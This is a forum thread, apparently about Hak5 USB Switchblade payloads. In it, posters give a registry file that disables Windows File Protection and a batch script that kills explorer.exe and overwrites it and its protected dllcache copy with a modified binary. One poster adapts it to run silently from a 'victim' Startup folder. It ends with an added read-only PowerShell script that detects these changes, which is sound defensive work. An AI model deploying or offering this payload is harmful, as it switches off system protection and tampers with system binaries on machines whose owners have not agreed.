
Posted

I decided to add code to my USB Switchblade that once inserted into a USB drive it would change the Start button into a Hak5 button.

NOTE: This code does not work well with Portqry.exe (the self port scan program with the USB Switchblade). The Portqry.exe process hangs and once you kill the process, the code will continue.

MAKE A BACKUP OF YOUR EXPLORER.EXE FILE BEFORE EVEN READING FURTHER!

You will need 4 things (these all go in WIPCMD):

1. A registry file to import a key that disables Windows File Protection

2. A modified version of explorer.exe

3. A batch file to delay time when copying the modified explorer

4. A copy of Pskill

First you must create a .reg file for disabling the Windows File Protection System and for disabling the prompt for Pskill. I decided to name this file wfpskill.reg and it includes the following registry keys:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"SFCDisable"=dword:00000001

[HKEY_CURRENT_USER\Software\Sysinternals\PsKill]
"EulaAccepted"=dword:00000001

Next you copy and paste explorer.exe into your WIPCMD folder and use ResHack to modify its Start button to whatever you want. Save the changes to explorer.exe. Then create a batch file named blank.bat and a batch file named explorer.bat.

Blank.bat will be blank (duh), and explorer.bat will have the following code:

@echo off
regedit.exe /s WIPCMD\wfpskill.reg
pskill.exe explorer.exe
RENAME C:\WINDOWS\system32\dllcache\explorer.exe explorer.bak
COPY /y F:\WIPCMD\explorer.exe C:\WINDOWS\system32\dllcache
TYPE NUL | F:\WIPCMD\blank.bat /N /CY /TY,5 >NUL
COPY /y F:\WIPCMD\explorer.exe C:\WINDOWS
C:\WINDOWS\explorer.exe
exit

Explorer.bat will disable the Windows File Protection System, kill the explorer process, rename the backup of explorer to explorer.bak, copy the modified explorer over, and restart the modified explorer process. Then simply call explorer.bat from the go.cmd script and you're good to go.

This is for educational purposes only, as I read root-ftw's post entitled "ownage" and this is very similar and could be used with other ResHack projects. I am not responsible for any OS injuries.

Mad props to KarmikTrance.

Posted

You can also give the file another name, like explorer2.exe, and then change that in the registry (not sure where it was anymore), so you won't have to disable Windows File Protection.

Also, maybe you can add some more info on how to edit the explorer.exe file, for those who never did it before.

For the rest, it's really nice, I'm gonna include something like this in my payload :D

Posted

In order to modify explorer.exe you need a copy of ResHack (http://www.angusj.com/resourcehacker/).

The "Start" button resource is located in String Table : 38 : 1033. Simply edit the copy of explorer.exe in your WIPCMD folder and save the changes.

NOTE: If you are going to add the code I mentioned in the above post to your go.cmd payload, make sure that you add it as the last program to run. Since the code kills the explorer.exe process, it is NOT silent. I have decided to modify my own code and copy the essential files to the 'victim' Startup folder, so that the Start button modification takes place upon the next reboot, and the Switchblade can run silently.

Changing the Start Button

(http://www.overclockersclub.com/guides/xpstartbutton.php)

Disabling Windows File Protection

(http://www.microsoft.com/whdc/archive/wfp.mspx#ENAAC)

PsKill

(http://www.microsoft.com/technet/sysintern...ads/PsKill.mspx)

Detailing Windows Explorer with ResHack

(http://wint.virtualplastic.net/showtweak.php?tweak_id=56)

Detailing Windows Explorer with ResHack #2

(http://wint.virtualplastic.net/showtweak.php?tweak_id=75)
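For anyone administering the machines this would land on, the artefacts the two posts above leave behind are easy to check for: the SFCDisable value under Winlogon, the PsKill EulaAccepted value under HKCU, a leftover explorer.bak in dllcache, a live explorer.exe that no longer matches its dllcache copy, and payload files in a Startup folder. The script below is an added example written for this thread, not code from the posts or from the Switchblade project. It assumes a Windows XP-era layout (SystemRoot with a system32\dllcache folder and an "All Users" Start Menu under ALLUSERSPROFILE); the SHA-256 routine goes through .NET directly because Get-FileHash is not available on older PowerShell.

```powershell
# Added example: read-only check for the explorer.exe swap described in this thread.
# Assumptions: XP-era paths (system32\dllcache, ALLUSERSPROFILE Start Menu); nothing is modified.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$windir   = $env:SystemRoot                       # normally C:\WINDOWS
$live     = Join-Path $windir 'explorer.exe'
$cache    = Join-Path $windir 'system32\dllcache\explorer.exe'
$bak      = Join-Path $windir 'system32\dllcache\explorer.bak'

function Get-Sha256Hex([string]$Path) {
    # Hash via .NET so this also runs on PowerShell 2.0, which has no Get-FileHash.
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs  = [System.IO.File]::OpenRead($Path)
    try     { ($sha.ComputeHash($fs) | ForEach-Object { $_.ToString('x2') }) -join '' }
    finally { $fs.Close(); $sha.Clear() }
}

$findings = @()

# 1. Windows File Protection switched off: the .reg file in the post sets SFCDisable.
$sfc = (Get-ItemProperty -Path $winlogon -Name SFCDisable -ErrorAction SilentlyContinue).SFCDisable
if ($sfc -ne $null -and $sfc -ne 0) {
    $findings += "SFCDisable=$sfc under Winlogon (WFP disabled); expected absent or 0"
}

# 2. PsKill EULA pre-accepted for this user. Harmless by itself, but the post's .reg
#    sets it so the tool runs without a prompt, so it is worth reporting alongside the rest.
$eula = (Get-ItemProperty -Path 'HKCU:\Software\Sysinternals\PsKill' -Name EulaAccepted -ErrorAction SilentlyContinue).EulaAccepted
if ($eula -eq 1) { $findings += 'PsKill EulaAccepted=1 under HKCU' }

# 3. The batch file renames the protected copy to explorer.bak and overwrites both copies,
#    so look for the leftover backup and confirm the live file and dllcache copy still agree.
if (Test-Path $bak) { $findings += "Leftover backup found: $bak" }
if ((Test-Path $live) -and (Test-Path $cache)) {
    if ((Get-Sha256Hex $live) -ne (Get-Sha256Hex $cache)) {
        $findings += 'explorer.exe differs from its dllcache copy'
    }
}

# 4. Authenticode status of the live explorer.exe. Microsoft ships explorer.exe catalog-signed,
#    so NotSigned alone proves nothing; HashMismatch (an edited, embedded-signed file) does.
if (Test-Path $live) {
    $sig = Get-AuthenticodeSignature -FilePath $live
    if ($sig.Status -eq 'HashMismatch') { $findings += "explorer.exe Authenticode status: $($sig.Status)" }
}

# 5. The follow-up post moves the payload into the Startup folder for the next reboot,
#    so list script and executable files in the per-user and all-users Startup folders.
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),
    (Join-Path $env:ALLUSERSPROFILE 'Start Menu\Programs\Startup')   # XP-era all-users path (assumption)
)
foreach ($dir in $startupDirs) {
    if (-not (Test-Path $dir)) { continue }
    Get-ChildItem -Path $dir -Force -ErrorAction SilentlyContinue |
        Where-Object { @('.bat', '.cmd', '.exe', '.reg') -contains $_.Extension } |
        ForEach-Object { $findings += "Startup item: $($_.FullName)" }
}

if ($findings.Count -eq 0) { 'No explorer.exe swap indicators found' } else { $findings }
```

Run it from an elevated prompt so the dllcache folder is readable. A non-zero SFCDisable is the strongest single indicator, since nothing legitimate on a workstation sets it; the Startup listing is informational and needs a human to judge what belongs there.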
